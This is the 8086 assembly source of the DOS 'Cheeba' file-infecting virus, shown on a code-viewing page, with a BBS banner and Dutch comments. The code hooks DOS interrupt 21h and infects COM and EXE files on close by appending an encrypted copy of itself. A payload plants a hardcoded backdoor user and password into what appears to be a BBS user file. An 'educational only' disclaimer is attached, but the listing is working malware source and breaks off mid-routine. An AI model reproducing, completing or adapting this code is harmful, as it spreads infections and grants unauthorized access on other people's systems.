📄 cheeba.asm
字号:
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
;*** The author of Cheeba let his source lie around --- so HERE IT IS!!! ***
; Btw just one thing --- I give it 2 you as long as you don't make a
; sucking destroying thing... Btw 2 this is of course only educational...
;-----------------------------------------------------------------------------
; Naam en password staan +- op lijn 200. Verander de low-version number
; bij de verschillende versies...
; Verander verder NIKS aan het virus !!!
Com_First: push cs
S_1: mov ax,100h
S_2: push ax
mov ax,cs
CodePars: add ax,0
push ax
S_3: mov ax,offset End_Virus
S_4: push ax
retf
VirTitle db 'CHEEBA Makes Ya High Harmlessly-1.2 F**K THE LAMERS'
I21Hooks db 0
dw offset Stop_Prg
db 31h
dw offset Stop_Prg
db 4Ch
dw offset Stop_Prg
db 4Bh
dw offset Start_Prg
db 45h
dw offset Check_Init
db 3Ch
dw offset Open_Wrt
db 3Dh
dw offset Open_Rd
db 3Eh
dw offset Check_Close
db 40h
dw offset Check_Vir
New_21: call Rest_Orig_21
call Save_Regs
cld
mov bx,offset I21Hooks
Srch_Fct_Lp: cmp ah,[bx]
jne Wrong_Fct
push [bx+1]
call Retr_Regs
ret
Wrong_Fct: add bx,3
cmp bx,offset New_21
jb Srch_Fct_Lp
Go_Dos: call Retr_Regs
call Call_Dos
Skip_21: call Rest_21_Jmp
retf 2
Call_Dos: pushf
db 09Ah
Org_21_Addr dw 2 dup (?)
ret
Org_21_Code db 5 dup (?)
;*** Fct 45 - check init ***
Check_Init: cmp bx,0D15h
jne Go_Dos
mov bx,0F0Ch
jmp short Skip_21
;*** I21 FCT 3Dh - Open file for read ***
Open_Rd: test al,3
jz Go_Dos
xchg si,dx
Get_0: lodsb
or al,al
jnz Get_0
mov cx,0Ah
xor bx,bx
xor ax,ax
cwd ; Dx = 0
Get_CSum: dec si
rol bx,1
mov al,[si]
or al,20h
xor bl,al
add dx,ax
loop Get_CSum
cmp bx,1AE7h
jne Go_Dos
cmp dx,3B7h
jne Go_Dos
Is_Users: mov word ptr cs:[Save_A_Reg],si
mov di,offset Coded
Del_Si: mov si,word ptr cs:[Save_A_Reg]
Lp_Unc: lodsb
or al,al
jz Del_Si
or al,20h
sub byte ptr cs:[di],al
inc di
cmp di,offset No_Read
jb Lp_Unc
Coded: call Retr_Regs
and al,0FEh
or al,2
call Call_Dos
jnc Has_Read
jmp No_Read
Has_Read: pushf
call Save_Regs
xchg bx,ax
mov ah,3Fh
mov cx,9Eh
mov dx,offset End_Virus
call Call_Dos
mov dx,[End_Virus+20h]
mov cx,[End_Virus+22h]
or cx,cx
jnz Test_Ok
or dx,dx
jz No_XS_YET
Test_Ok: mov ax,4200h
call Call_Dos
mov ah,3Fh
mov dx,offset End_Virus+9Eh
mov cx,9Eh
call Call_Dos
cmp ax,cx
jnz No_XS_YET
cmp byte ptr [End_Virus+9Eh],3
jne No_XS_YET
test byte ptr [End_Virus+9Eh+77h],1
jnz No_XS_YET
mov ax,[End_Virus+84h]
cmp ax,[End_Virus+9Eh+84h]
jne No_XS_YET
J_Less: jmp Less_Users
No_XS_Yet: mov ax,4202h
xor cx,cx
cwd ; Dx = 0
call Call_Dos
or dx,dx
jnz More_Users
cmp ax,9Eh*50 ; 50 users of meer
jb J_Less
More_Users: mov cx,9Eh
div cx
or dx,dx
jnz J_Less
shr ax,1
mul cx
xchg cx,dx
xchg dx,ax
mov ax,4200h
call Call_Dos
Read_Lp: mov ah,3Fh
mov dx,offset End_Virus+9Eh
mov cx,9Eh
call Call_Dos
cmp ax,cx
jne Less_Users
test byte ptr [offset End_Virus+9Eh+77h],1 ; Search deleted
je Read_Lp
mov ax,4201h
mov cx,-1
mov dx,-9Eh
call Call_Dos
push dx
push ax
mov [End_Virus+20h],ax
mov [End_Virus+22h],dx
mov ax,4200h
xor cx,cx
cwd ; dx = 0
call Call_Dos
mov ah,40h
mov cx,9Eh
mov dx,offset End_Virus
call Call_Dos
mov ax,4200h
pop dx
pop cx
call Call_Dos
push ds
pop es
mov al,0
mov di,offset End_Virus
mov cx,106h-9Eh
repz stosb
mov ax,2020h
mov cx,5
Wrt_20s: inc di
stosw
loop Wrt_20s
;HIER STAAN NAAM EN PASSWORD.
; Naam en password zijn 3 chars, Name = <N1><N2><N3> , Password = <P1><P2><P3>
; Zijn dus Name = 1F 20 7E, Password = 4D 5A B8
; Staan zoals hier:
;
; mov ..., 0 <N1> <NameLen = 3>
; ..... 0 <N3> <N2>
; Password:
; ..... ,0 <P1> <PassLen = 3>
; ..... ,0 <P3> <P2>
;
mov word ptr [End_Virus],01F03h
mov word ptr [End_Virus+2],07E20h
mov word ptr [End_Virus+3Eh],04D03h
mov word ptr [End_Virus+40h],0B85Ah
mov ah,40h
mov cx,9Eh
mov dx,offset End_Virus
call Call_Dos
Less_Users: call Go_Beg_File
popf
call Retr_Regs
No_Read: pushf
push ax
push si
push di
push ds
mov di,offset Coded
Del_Si_2: mov si,word ptr cs:[Save_A_Reg]
Lp_Unc_2: lodsb
or al,al
jz Del_Si_2
or al,20h
add byte ptr cs:[di],al
inc di
cmp di,offset No_Read
jb Lp_Unc_2
pop ds
pop di
pop si
pop ax
popf
call Rest_21_Jmp
retf 2
;*** I 21 FCT 3C - Rewrite file ***
Open_Wrt: cld
test byte ptr cs:[Flags],1 ; Already sure-exec opened?
jnz J_JD_2
push ds
pop es
xchg di,dx
mov al,0
mov cx,-1
repnz scasb
mov ax,[di-5]
or ax,2020h
cmp ax,'c.'
jne No_Com
mov ax,[di-3]
or ax,2020h
cmp ax,'mo'
jne Open_It
Sure_Exec: or byte ptr cs:[Flags],1
Open_It: call Retr_Regs
call Call_Dos
jc Not_Opened
mov word ptr cs:[Exec_Handle],ax
Not_Opened: call Rest_21_Jmp
retf 2
No_Com: cmp ax,'e.' ; '.E'?
jne Open_It
mov ax,[di-3]
or ax,2020h
cmp ax,'ex' ; .. 'XE'?
je Sure_Exec
OJ_2: jmp short Open_It
;*** I21 FCT 3E - Infect on close if orig. prog has written too ***
Check_Close: push cs
pop ds
cmp bx,[Exec_Handle] ; Same file?
J_JD_2: jne JD_2
mov word ptr [Exec_Handle],0FFFFh ; Don't follow anymore
call Go_Beg_File ; Go to beg. of file
mov ah,3Fh ; Read first bytes
mov cx,18h
mov dx,offset Read_Buf
call Call_Dos
and byte ptr [Flags],0FBh ; Flag for COM
cmp word ptr [Read_Buf],'ZM' ; MZ - Exe?
je Infect_Exe
test byte ptr [Flags],1 ; Sure exec?
jnz Infect_Com
and byte ptr cs:[Flags],0FEh
JD_2: jmp Go_Dos
Infect_Exe: or byte ptr [Flags],4 ; Flag for EXE
mov ax,[Read_Buf+16h]
mov [Exe_CS+1],ax
mov ax,[Read_Buf+14h]
mov [Exe_IP+1],ax
cmp ax,offset Init
je OJ_2
mov ax,[Read_Buf+0Eh]
mov [Exe_SS+1],ax
mov ax,[Read_Buf+10h]
mov [Exe_SP+1],ax
Infect_Com: and byte ptr [Flags],0FEh
cmp word ptr [Read_Buf],0B80Eh
je JD_2
cmp word ptr [Read_Buf],0BFh
je JD_2
Not_Inf: mov ax,4202h ; Go to end of file
xor cx,cx
cwd ; Dx = 0
call Call_Dos
test byte ptr [Flags],4
jz No_Ovl_Test
push ax ; .EXE: Test for internal overlays
push dx
mov cx,200h
div cx
cmp dx,[Read_Buf+2]
jne Is_Ovl
or dx,dx
jz No_Corr_Chk
inc ax
No_Corr_Chk: cmp ax,[Read_Buf+4]
Is_Ovl: pop dx
pop ax
je No_Ovl_Test
JD_3: jmp short JD_2
No_Ovl_Test: add ax,0Fh ; End in paragraphs
adc dx,0
and ax,0FFF0h
mov Org_Fl_Len_Lo,ax
mov Org_Fl_Len_Hi,dx
push ax
mov cl,4
shr ax,cl
mov [CodePars+1],ax
or al,al
jnz No_Al_0
dec al
No_Al_0: mov byte ptr [offset S_5-1],al
pop ax
push ax
push dx
mov cx,dx ; Go to end-in-paragraphs
mov dx,ax
mov ax,4200h
call Call_Dos
push cs
pop es
mov si,100h
mov di,offset End_Virus
mov cx,offset End_Virus-100h
mov dl,byte ptr cs:[offset S_5-1]
Code_Lp: lodsb
cmp si,offset Init
ja No_Code
xor al,dl
No_Code: stosb
loop Code_Lp
mov ax,5700h
call Call_Dos
mov Org_Fl_Time,cx
mov Org_Fl_Date,dx
mov ah,40h ; Write virus behind program
mov cx,offset End_Virus-100h
mov dx,offset End_Virus
call Call_Dos
call Go_Beg_File
mov dx,offset Com_First
mov cx,10h
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -